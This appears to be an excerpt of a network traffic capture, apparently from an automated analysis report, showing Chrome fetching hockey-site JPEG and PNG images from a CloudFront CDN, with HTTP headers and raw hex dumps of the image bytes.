                                                                                                                          2025-01-13 21:01:18 UTC817INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 02 e3 49 44 41 54 78 9c ed 99 cb 4b 54 71 14 c7 7f 11 18 58 8b 84 28 0a 7a 2c 6a 53 54 ab fe 85 ac 28 4a 09 97 b5 ab 4d 41 ad a3 70 1d 08 d1 6b 7e 99 65 8a 62 26 ad ca 47 09 be b2 97 59 2d d4 de 8b 50 7a 98 61 d6 4c 6a ea f8 89 e3 34 32 f7 ce ef 36 cd d8 bd 73 85 fb 85 b3 19 ce ef de f3 f9 9d 73 7e bf 33 33 4a 05 0a 14 28 90 af 45 48 ed 47 ab 0e 42 2a 82 56 78 62 21 15 21 a4 da d1 aa 70 6e c1 6b 75 c6 b3 a0 b5 23 4c c9 5c 76 3e bb c1 eb 59 88 82 4c 00 ee f9 08 a0 2d 13 00 ef 6a 5e a7 b4 70 fa 00 a6 07 89 a2 13 30 3e 0c 23 6f 61 e0 2e f4 9e 87 96 83 50 b5 c6 55 08 f5 df 00 fe a6 6f 2f a1 eb
                                                                                                                          Data Ascii: PNGIHDR00WpHYsIDATxKTqX(z,jST(JMApk~eb&GY-PzaLj426ss~33J(EHGB*Vxb!!pnku#L\v>YL-j^p0>#oa.PUo/


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          76192.168.11.204989054.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC678OUTGET /app/uploads/gthl/2024/12/20145510/U10-A-Applewood-Coyotes-GTHL-Community-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 122864
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Fri, 20 Dec 2024 19:55:11 GMT
                                                                                                                          ETag: "9c4b1656fd7092d4480b8fa028b98bf8"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 77dc0904034d14a129bafe4c9d954f08.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: uWUxD06sADaa4JEOvqRL9DonTe3mRib9nuHPNYTe2eXesGMC-jBSSQ==
                                                                                                                          2025-01-13 21:01:18 UTC15896INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 07 04 05 06 08 02 03 09 01 00 0a ff c4 00 60 10 00 01 03 03 03 02 04 04 03 05 04 05 07 07 01 19 01 02 03 04 05 06 11 00 12 21 07 31 08 13 41 51 14 22 61 71 32 81 91 15 23
                                                                                                                          Data Ascii: JFIF&&CC"`!1AQ"aq2#
                                                                                                                          2025-01-13 21:01:18 UTC1082INData Raw: 6d 0a de b7 bc d7 7c c0 8f 9b 71 1e fb 49 fa 8d 40 e3 34 40 ba f9 44 f8 31 4b 4d aa af 34 fd d5 3e 97 db f4 7b 16 85 d3 e1 50 69 e5 45 92 a4 30 ec a5 f9 61 60 83 94 93 e8 0f d3 5c e0 b8 2b 53 6a 53 16 c3 ca 68 31 1d f7 7c 96 db 40 09 40 2a c1 c1 1d ff 00 08 ef 9e da e8 8f 54 2f 5b 7a 67 4f 2b d7 c5 c9 22 23 4f c0 a4 aa 45 32 2b ef 04 b8 b9 47 86 f6 a3 39 59 dc a1 9c 7d 33 ae 6a ef 27 f1 7e 23 df 57 1d 0b 59 88 97 2c ff 00 b4 02 36 48 d6 b7 9f fc 2d e0 f3 8d 7d ad 69 56 7b 9e da c9 3a be 59 d5 96 ed bc 63 be bd 51 f5 fc b5 88 1d fe 9a fb 77 00 0f 4d 72 55 97 db 5f 1e 0f be b1 07 3c 1d 7d b8 8f a6 b9 22 25 74 35 05 cb 8a 7e f8 e5 6c 37 0f cd 5a fd 1b 21 61 29 cf df 71 d5 87 aa f5 0f fd 0e 88 eb 6c 36 1e 52 c0 09 4a c6 47 6e 35 4d 61 55 a5 d1 dd f8 e8 b2 56
                                                                                                                          Data Ascii: m|qI@4@D1KM4>{PiE0a`\+SjSh1|@@*T/[zgO+"#OE2+G9Y}3j'~#WY,6H-}iV{:YcQwMrU_<}"%t5~l7Z!a)ql6RJGn5MaUV
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 54 7d 33 21 f3 ff 00 7b 5d ad de 4b b4 8f 35 d9 33 e3 27 c3 92 4e 0f 51 a3 ff 00 f8 33 df fb 1a 4b 54 f1 b3 e1 9e 8f 01 ca a4 fe a4 32 88 ec 63 7a d3 0a 42 b6 e7 e8 10 4e b8 f0 3a a3 d2 f0 72 8e 9a 64 8e d9 53 c7 fe f6 b5 cd ea 3d 83 55 a7 c8 a6 b7 d3 45 b6 97 d0 53 fb a6 dc 2a 3f 4e 73 ae d6 ff 00 24 ba 5b e6 ba de e7 f6 88 78 43 69 ef 21 ce ab b4 16 4e 3f fb 5b 2b 1f af 97 ad ec f8 ff 00 f0 9f 21 e5 b2 cf 53 52 b5 b7 ca b1 4c 95 fd 7c bd 71 b2 15 ed 6f d1 5e 52 9e e8 c2 23 ac f2 96 a5 c1 5a d4 91 8e 0f cc 3f a0 00 e9 75 12 45 76 f3 ae 3e 8b 6b a7 15 36 dd 98 d8 6d 22 24 35 25 94 af b0 27 80 12 3e bd b4 f0 4f 74 da 5d a8 9f e2 57 a3 57 4d 8f 51 9d 43 bb 7c f6 66 53 9e f2 14 62 3c 8d db 90 a0 9f c4 91 8c 9d 54 6b 4d af 87 a4 21 58 f9 9f 25 c3 f4 f4 1a 8b
                                                                                                                          Data Ascii: T}3!{]K53'NQ3KT2czBN:rdS=UES*?Ns$[xCi!N?[+!SRL|qo^R#Z?uEv>k6m"$5%'>Ot]WWMQC|fSb<TkM!X%
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: e9 23 f7 b4 e7 7d c5 6a 15 dd 52 30 ad 99 b4 08 8e be a7 22 c1 94 49 71 a6 cf 61 b8 fe 2f b8 e3 52 2a 47 47 ae 6e a3 58 ee 4a 76 23 92 29 5e 5a 9b 65 51 54 82 b4 bb bc 90 48 ef c1 20 94 9e 30 9f 7c 6a 59 61 f5 af a7 de 20 e9 0b b4 eb 74 ef 81 aa ec dd f0 52 4f ef 13 8e ee 47 77 03 70 1f 6d c3 d4 11 ce be ab cf ea 7f 4b 2c ea c5 32 d9 b7 61 dc 30 e9 2c bd 36 34 e7 64 88 c2 3a 02 3e 50 bd c7 0b 70 15 92 12 90 77 ed 1e d8 d6 a7 27 fe 50 cf eb fd 31 bd 27 2b 13 c2 cc 89 cd b0 5d 6d 73 2a b5 35 c7 bd f6 37 7d 89 dd 67 9d ec 34 78 19 0f ea 38 93 78 b0 3c 1a a1 b8 75 83 45 a3 d2 fb 73 ca a4 17 85 3a b1 69 55 dc b6 ee 06 cb 52 e1 c9 f2 cb 4b 50 2a 46 3d 38 f4 e7 8f be a1 95 67 cc a7 23 b6 e0 d8 14 e9 56 33 ec 34 96 bd 71 d5 2b b5 19 95 5a b3 cb 72 6c 97 8b ce 2d
                                                                                                                          Data Ascii: #}jR0"Iqa/R*GGnXJv#)^ZeQTH 0|jYa tROGwpmK,2a0,64d:>Ppw'P1'+]ms*57}g4x8x<uEs:iURKP*F=8g#V34q+Zrl-
                                                                                                                          2025-01-13 21:01:18 UTC1024INData Raw: 6e 48 f6 db 39 43 fa a3 42 e4 75 7f a8 31 56 03 37 24 8e 3d d4 7f cf 4b 58 f1 03 d5 18 c7 e4 b8 9e 24 71 cb 8a ff 00 3d 77 bb 7f c8 d1 71 36 3b fe 6d 23 f6 21 25 f4 d2 3f 30 52 ca 87 83 9e bd a1 b5 7c 3d 1a 94 f9 c1 c7 97 53 6b 93 8e 3f 16 35 95 ab e1 5b ae 36 fc 54 b5 2e cb 2a 50 3f 36 c9 8c 2b fa 2f 4c 31 fc 50 f5 69 85 84 a2 ba ea b1 8e ee 2b df eb a9 c5 2f c4 57 56 24 21 39 ae 61 47 00 6e 48 3f e1 a5 f7 af f9 26 1e 61 c7 7f d5 c3 ff 00 72 6f 85 d3 4f e7 70 fa 29 d5 03 a4 fd 48 a4 53 19 62 4d 99 3c 2d 29 56 e0 80 95 72 4f 3d 8f b6 93 56 2c 7e a0 24 28 7f a1 75 83 eb c4 55 1f e9 a5 5f f2 b9 d5 b8 6d a5 6b b8 62 3a 70 09 4a d8 c6 93 af c4 a7 53 60 2c 21 e1 05 f3 f4 41 1a 8d fd 73 fe 40 8b f1 f4 e8 9d f2 79 1f e5 3f dd b0 1d b8 94 fd 94 2a 7d 9f 79 36 e1
                                                                                                                          Data Ascii: nH9CBu1V7$=KX$q=wq6;m#!%?0R|=Sk?5[6T.*P?6+/L1Pi+/WV$!9aGnH?&aroOp)HSbM<-)VrO=V,~$(uU_mkb:pJS`,!As@y?*}y6
                                                                                                                          2025-01-13 21:01:18 UTC1024INData Raw: 7f de 54 22 e5 af a2 c9 ab 2a e1 6d d4 a9 e9 74 b5 38 94 81 94 29 fc a5 3b 80 fb 9d 0b a4 75 ae 7d 6a a9 3b a6 5d 52 6a 23 d3 9c 4f c5 52 6a ad b6 10 e0 51 19 09 38 ee 92 9e 3e da 2a 55 69 d0 2e 1a 3c ea 14 f0 14 b8 2e 3a 1a 71 0d 85 38 d7 cc 36 91 eb 8c e3 23 d7 1a a9 5d 6c a1 54 db ea 85 8c 80 f2 0c b2 e2 e3 29 6c af 21 68 0a 05 1d bf de 50 fb 6a c2 b7 43 13 b2 b1 34 55 1a 4d 12 3c 00 72 e3 8c 85 f1 ea a5 a8 91 fc b1 a9 05 34 30 e0 f2 9e 6b 7b dd 95 ce 36 9c 6a 1b 43 96 64 ba 21 b2 85 3a eb 5b 5a 64 e3 80 94 80 91 9f d3 45 6b 6a d7 7b 7c 77 65 72 a7 14 3c e5 63 84 8e f9 3a 72 e1 b2 96 bb 2d 34 1b 45 29 7d a4 a4 f9 41 49 52 bb f6 ef ae 3f 7f 68 1d e4 f5 c9 7f 43 69 2f ef 8e c8 4e c1 9e 39 59 e7 fe ce ac df f6 80 f5 ef ac 56 55 c6 8b 76 9d 5e 6a 8d 6c cb
                                                                                                                          Data Ascii: T"*mt8);u}j;]Rj#ORjQ8>*Ui.<.:q86#]lT)l!hPjC4UM<r40k{6jCd!:[ZdEkj{|wer<c:r-4E)}AIR?hCi/N9YVUv^jl
                                                                                                                          2025-01-13 21:01:18 UTC1730INData Raw: 12 38 d5 3c 7d 3d d0 e4 03 17 17 c8 f2 57 72 75 38 b2 71 08 7f 35 c1 f3 5c b8 98 5a 5c a7 5c 65 25 2d ad 65 49 49 39 20 13 c6 4e bc 6b e7 1b 73 f6 d4 d7 ac d6 d5 bf 6b 75 06 a9 4c b6 66 b3 22 02 5c dc 94 34 ad c1 85 1f c4 d6 7d 76 9f a9 e3 4d f6 95 97 73 dc d2 08 a2 d0 e6 4c 2d 27 cd da d3 24 fc b9 c0 24 9e 00 cf 19 ce b5 11 b6 cd 2c 83 92 68 29 4d 39 b4 c9 4f c9 20 83 b5 4b 49 52 40 3f 4d 7d 4c a4 dc 77 75 72 2d 06 9e a5 cc 9b 3d e4 b2 c3 69 38 05 44 f1 fe e8 f5 24 f0 06 a5 f3 7a 4b d4 b4 c8 8a dc ab 6d 68 33 1c 2d 34 7e 21 92 84 ac 24 a8 85 a8 28 86 fe 50 4f cc 47 63 a3 54 7a 4c 2b 32 87 60 c1 a4 74 ed 14 ea f4 58 6e 3d 70 56 99 79 b7 16 b4 3f bc 36 14 90 a2 48 23 cb 56 ec 60 02 30 79 3a 93 20 98 d8 4b 79 4b 03 5a f9 1a d7 9d 89 40 19 7d 15 ea 54 69 b3
                                                                                                                          Data Ascii: 8<}=Wru8q5\Z\\e%-eII9 NkskuLf"\4}vMsL-'$$,h)M9O KIR@?M}Lwur-=i8D$zKmh3-4~!$(POGcTzL+2`tXn=pVy?6H#V`0y: KyKZ@}Ti
                                                                                                                          2025-01-13 21:01:18 UTC9000INData Raw: 75 54 be b4 ca 92 e8 8f 0e 3a 19 09 2b 53 ae 10 48 e1 63 00 24 e7 e9 df 56 c0 95 57 a0 94 87 a9 3d 0e 8f d5 86 18 66 f1 bf aa 92 5b 85 39 33 a1 24 45 40 f8 75 6d 28 52 47 27 85 24 f3 f5 19 c6 a0 35 af 04 1d 37 ac d5 a6 d4 e4 dd f5 f4 a6 63 c5 f2 c3 08 65 09 42 8f 7c 12 82 71 9e 7f 3d 16 28 7d 44 55 62 9b 47 a9 7e cb 4c 74 55 e9 26 aa da 54 e9 5a 90 92 50 96 db 21 23 95 2d 4e 60 63 db b6 a3 f6 7f 5b e1 dd 35 86 2d f7 6d aa 94 09 ae 4b 7e 1a 83 81 4a 49 53 23 f7 8b 46 50 09 40 56 13 92 06 0e 73 8c 73 19 8c 49 bb c2 95 92 c9 17 e0 34 87 15 bf ec fb e9 05 cd 05 34 aa cd db 7b 3d 4d ca 54 a8 28 a8 34 db 2b 52 7b 28 a4 35 ca b9 ef ac e9 1f d9 d9 e1 c2 91 4f 87 4a 44 1b 92 44 38 52 7e 2d b6 1d ab 9f 2d 4e e4 65 4a 09 48 dc 7e 50 39 f4 18 d5 92 49 56 cd c5 4a e0
                                                                                                                          Data Ascii: uT:+SHc$VW=f[93$E@um(RG'$57ceB|q=(}DUbG~LtU&TZP!#-N`c[5-mK~JIS#FP@VssI44{=MT(4+R{(5OJDD8R~--NeJH~P9IVJ
                                                                                                                          2025-01-13 21:01:18 UTC8408INData Raw: 4c 4a cc d4 61 4c 16 cb 81 c0 73 ca 4a 12 a5 03 ec 0e bb 75 d7 b2 98 30 d8 42 73 8d 66 17 83 f7 d4 66 27 53 ba 7f 3d 75 56 21 dd d4 e7 97 42 8e b9 55 14 a1 cc fc 33 48 19 5a 95 c7 f0 fa e3 38 3c 1e 74 d5 ff 00 2d 9d 27 f8 c8 70 d3 7e 52 d4 ed 42 24 59 f1 92 95 95 07 23 c9 51 4b 0e 64 0c 04 ac 83 8c e9 68 f9 24 ba 53 d0 73 af 82 92 3d b4 3a 67 af fd 28 90 c4 09 31 ee 67 1e 45 4d e5 33 10 37 4f 92 a5 3a 02 52 a2 e0 48 6f 25 b0 95 a0 f9 98 db 85 0e 75 a9 1e 20 7a 5a ed 43 f6 6c 6a dc b7 dc 4c 77 a5 3a a6 69 cf ad 0c b4 d2 dd 42 94 e1 09 f9 46 e6 1d 03 3d f6 fd 46 54 34 95 da 91 27 79 dd df 8d 7a 5c 4f 70 74 34 8f e2 03 a6 af d3 28 15 75 cf 9f 1a 35 cd 53 4d 26 9c 64 41 71 b2 e3 aa 48 52 56 72 38 6b 0a 4f cf d8 15 00 79 e3 4d f2 fc 49 f4 f1 84 42 6e 33 15 79
                                                                                                                          Data Ascii: LJaLsJu0Bsff'S=uV!BU3HZ8<t-'p~RB$Y#QKdh$Ss=:g(1gEM37O:RHo%u zZCljLw:iBF=FT4'yz\Opt4(u5SM&dAqHRVr8kOyMIBn3y
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 39 db 8c f1 a0 fa b4 e3 11 9a 61 00 17 72 42 2f a6 c3 ef 0f b7 ee 1b c2 80 42 b0 6d 28 aa 75 0e b3 15 75 38 f9 4a 19 5e 1b 46 ef 7c 0e d8 fb e7 ed a1 f5 e9 62 5c 74 f5 7c 6d 39 b4 c7 79 7c b6 23 2f 2d 9f 7c 1f 4f b1 d5 ee e9 ff 00 85 bb 32 4b 0d 54 6e a5 38 a7 9c 3e 66 d6 dc f9 8e ef 55 13 9d 13 27 78 7b e9 b4 68 62 9b 02 9c a9 4b 74 04 85 ba 41 f2 d3 eb e9 ac d3 25 7d ea 25 68 bc 06 1f 85 71 c6 b5 41 ea 0c 49 5f b5 e4 a8 be d0 ca 42 94 bd c3 b0 c8 fa 7d f4 d9 4d a8 48 93 53 fd 9f 73 46 fd db 98 29 5a db 27 69 39 e7 dc 8d 74 f2 f7 f0 d6 ed 36 14 b3 40 a0 07 a3 6d 59 28 d8 09 e3 db df df 41 09 3e 1c 23 c6 0e 57 2a b6 f5 42 10 5b 7b 5b 71 2d 67 6e ee c0 24 f6 fb e8 a6 67 57 e2 6d 21 e4 c1 77 e5 36 a9 35 d1 6b c2 89 0d ca c5 32 53 6b 4b 6b db 22 30 ce 51 cf
                                                                                                                          Data Ascii: 9arB/Bm(uu8J^F|b\t|m9y|#/-|O2KTn8>fU'x{hbKtA%}%hqAI_B}MHSsF)Z'i9t6@mY(A>#W*B[{[q-gn$gWm!w65k2SkKk"0Q


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          77192.168.11.204989154.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC436OUTGET /app/uploads/gthl/2024/12/17102800/Player-Movement-Website-Graphic-730x410.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 60817
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Tue, 17 Dec 2024 15:28:02 GMT
                                                                                                                          ETag: "5253271f085dadf8889f2833ee750ec6"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 924c3fd5fff04ef5cac09fbfc470e618.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: hOHazBH61a7ECEesXAq_uJzRUEb1Ff2Q3DmDdC8NI1X5qE4uzQsgag==
                                                                                                                          2025-01-13 21:01:18 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9a 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 09 01 03 04 08 02 05 07 06 0a ff c4 00 6d 10 00 01 02 05 02 03 04 03 09 0b 06 07 0a 0a 06 0b 01 02 03 00 04 05 06 11 07 12 08 21 31 13 22 41 51 09 14 61 15 16 32 52 71
                                                                                                                          Data Ascii: JFIF&&CC"m!1"AQa2Rq
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: f9 41 b8 79 eb eb 37 37 ec 55 fd a8 b2 ff 00 1f fc 3d 3a 41 f5 ab 98 60 7f e6 45 fd a8 8d 38 44 6b 5a fe af 80 5e 08 f9 3c b8 d4 f9 97 74 92 7f bf e7 87 bf e9 77 37 ec 45 7d b8 a7 df f3 c3 df f4 bb 9f f6 22 be dc 46 cc 21 ad 2b fa be 1f 72 79 a4 e4 ff 00 4d 4f 99 77 49 26 fb fe 78 7b fe 97 73 7e c4 57 db 8f a8 d3 7e 2d b4 5f 54 ee b9 6b 2e da aa d4 d9 aa 4e 21 6a 96 44 fd 3d 52 c8 79 49 19 2d a5 44 90 56 46 48 4f 8e 0e 22 2c 62 f4 8c f4 ed 32 76 5e a5 4d 9b 76 56 6e 51 d4 3f 2e fb 4a da b6 9c 49 05 2b 49 f0 20 80 44 4c 73 4a c9 ad 24 ac 59 c4 78 22 c9 27 46 51 a1 39 c6 76 76 6e 49 a4 f8 5d 68 ab ae 9d a8 9b 46 26 36 61 0e 1c a3 c3 d9 fc 23 e4 f5 67 57 6d 6d 18 b7 59 ba ae f9 5a b2 e9 6e cc 26 59 6f d3 e4 8c c8 65 6a 1d c2 e6 08 da 95 1e 40 f4 ce 07 52 33
                                                                                                                          Data Ascii: Ay77U=:A`E8DkZ^<tw7E}"F!+ryMOwI&x{s~W~-_Tk.N!jD=RyI-DVFHO",b2v^MvVnQ?.JI+I DLsJ$Yx"'FQ9vvnI]hF&6a#gWmmYZn&Yoej@R3
                                                                                                                          2025-01-13 21:01:18 UTC2106INData Raw: 43 64 a1 b5 4b b9 87 37 15 ed 4f 20 46 4f 58 8e 9b 06 81 a7 f6 75 bf a7 d7 a6 a1 e9 7c 9d cb a8 73 ad aa fd 9d ac cd 4f 3e d4 da 67 e6 66 1c 76 45 2f 8c 94 3a c8 69 2c ba a6 94 90 49 50 3b 86 48 3d c5 fa d5 ad 37 79 54 64 b5 4f 48 ac bb c2 b3 44 a9 ba c2 aa 93 72 8e 49 cd 4c ad 97 08 4a a6 17 28 a6 d3 32 95 04 a4 9e d1 24 a8 1e 67 9c 7c f5 c5 5b aa dd f5 ca b5 76 bd 71 c8 d3 36 ca bb 5b ae d7 27 18 2a 97 a6 48 a1 68 6b 7a 58 6f 05 c5 95 2d a6 18 97 46 02 94 52 9c a5 29 26 39 dc 46 6b 2c 52 8d 0c 1d d4 db e3 c2 c7 a8 65 7c 8d a5 94 3a 99 86 7a e3 2c 3c 63 75 66 de 93 76 b3 e0 fd 9d 2d ae 07 41 77 5c f7 1d b5 63 6a 76 a3 db f5 27 d9 bb 69 b2 94 69 69 5a a3 6b c4 d4 8c bd 46 6a 64 4f cd 32 7a b6 b7 14 d3 0c 97 93 cd 21 c2 90 46 f8 d5 8b 33 5a f5 32 c9 be 24
                                                                                                                          Data Ascii: CdK7O FOXu|sO>gfvE/:i,IP;H=7yTdOHDrILJ(2$g|[vq6['*HhkzXo-FR)&9Fk,Re|:z,<cufv-Aw\cjv'iiiZkFjdO2z!F3Z2$
                                                                                                                          2025-01-13 21:01:18 UTC12792INData Raw: e2 17 8f 8c 47 c9 14 2e 63 f2 49 f6 45 24 d8 ba 95 1c f4 8e 79 8c 74 95 29 40 ed db f2 79 45 e1 cf c6 04 95 c8 e9 0c c2 10 05 73 ec 86 7d 91 48 40 15 cf b2 19 1e 51 48 72 f2 80 2b 91 e5 0c c5 39 79 45 79 40 0c 88 64 43 02 2b 88 01 91 0c 88 60 43 10 03 22 19 84 31 00 21 08 40 08 42 10 02 10 84 00 84 20 4e 06 40 27 e4 80 10 c4 71 fc 21 fc 94 8f 94 e6 1b 57 e2 e6 3e 41 88 03 ad 9a dc 1f 59 50 c6 4c 63 a4 45 f9 a7 03 ae 61 1f 05 3c 81 f3 f6 c5 a4 94 8c ee 4e 47 cb 8c 40 96 5c 61 a4 2d 2b 2a ce 47 b6 32 e5 13 b5 dd a9 20 8d a7 9e 39 c6 23 6a 40 50 24 e3 3e 7c a3 2d 95 04 b8 30 31 9e 51 4b 76 62 c6 5c 21 02 32 31 e7 15 10 6b 56 b3 71 fb a1 fa 23 a8 d3 3a 6d 70 49 dd 35 59 aa 3b 6c bd 70 cf 51 a9 46 6a 52 84 db a0 16 cc d2 c1 04 64 29 24 84 83 80 47 8f 28 f6 cd
                                                                                                                          Data Ascii: G.cIE$yt)@yEs}H@QHr+9yEy@dC+`C"1!@B N@'q!W>AYPLcEa<NG@\a-+*G2 9#j@P$>|-01QKvb\!21kVq#:mpI5Y;lpQFjRd)$G(
                                                                                                                          2025-01-13 21:01:18 UTC3592INData Raw: 5a e1 d2 cb ca ac 9a 7d 2a e9 6e 5c b5 53 69 21 f3 4b a8 4b ad 4a 96 99 53 63 2a 5b 5d f7 1b 71 29 ef 6c 70 91 92 90 0f c2 49 d8 5a 65 2d 54 b8 2d b6 34 96 df bb dc b7 2b 95 0a 4c cd cb 5f ad d5 59 98 ac 3c d4 c3 83 b6 0d 4b 2d 2d b6 90 8e cd 24 73 ca 82 8e 79 c7 63 27 a3 ba 77 7c d3 ab b6 e5 2f 47 2d eb 76 b8 ec d5 1a 89 42 aa 51 6b 75 57 16 dd 5e 7e 64 94 a5 69 99 71 48 2d b7 26 cc d3 ee 72 c8 48 47 31 9c c6 35 0c b6 30 c4 de 15 bf 11 6d fd df 8f 13 67 8b f0 8b 84 c7 61 a5 96 cf 09 f8 6d 68 db 4f 6a 4a d6 fc 96 ba b2 6b d6 6e 4f 0e 7c 69 e9 f7 0f b4 1a 3e 86 71 05 60 52 b4 cd e9 64 62 9f 70 db b2 e8 7e db ad a7 a7 ad a1 c6 33 b1 4b 18 52 89 04 64 f3 d9 f0 46 ee d0 75 2f 4e ee 7a 3c a5 c1 6e df 34 0a 8d 36 79 b0 f4 b4 d4 bd 45 95 b6 ea 0f 88 3b a2 15 d7
                                                                                                                          Data Ascii: Z}*n\Si!KKJSc*[]q)lpIZe-T-4+L_Y<K--$syc'w|/G-vBQkuW^~diqH-&rHG150mgamhOjJknO|i>q`Rdbp~3KRdFu/Nz<n46yE;
                                                                                                                          2025-01-13 21:01:18 UTC2754INData Raw: db b5 2a 0f 1d ca 00 0d f2 8a c6 b3 68 b5 7f 88 36 b8 87 ba ed 3b fa 66 f0 af 5a 12 ad 4d a2 9d 54 9b a3 b3 4d a7 32 1a 71 94 30 92 0c b2 55 32 f3 89 ed 55 db 32 fa 9b 56 54 4b 4d 77 40 d9 98 01 1f 3f 74 69 f5 8b 7b a5 b4 de 36 75 16 b6 19 fc 5f ba 12 2d be 51 f2 15 82 44 7d 04 20 0f 3d fb de 74 27 f4 3d 66 fe c5 97 fb 30 fb de b4 27 f4 3d 66 fe c5 97 fb 31 e8 50 80 3a da 25 b7 6f 5b 54 f4 d2 6d da 1c 85 32 49 03 02 5e 4e 59 0c b6 07 f9 29 00 47 c9 cc 68 0e 87 cd 3e e4 cc c6 91 59 ee 3a f2 ca d6 b5 51 a5 f2 a5 13 92 4f 77 ce 3e fa 10 07 c9 db 3a 4d a6 16 65 44 d5 ed 2d 3e b7 68 d3 c5 05 af 59 91 a6 b4 cb bb 0f 54 ee 4a 41 c1 8e 57 46 95 e9 a5 ed 3c 8a a5 df 60 db f5 a9 c6 db ec 93 31 3f 4e 69 f7 02 3a ed dc a4 93 8f 64 7d 54 20 0f 3f 6b 87 ed 0d 61 d4 3e
                                                                                                                          Data Ascii: *h6;fZMTM2q0U2U2VTKMw@?ti{6u_-QD} =t'=f0'=f1P:%o[Tm2I^NY)Gh>Y:QOw>:MeD->hYTJAWF<`1?Ni:d}T ?ka>
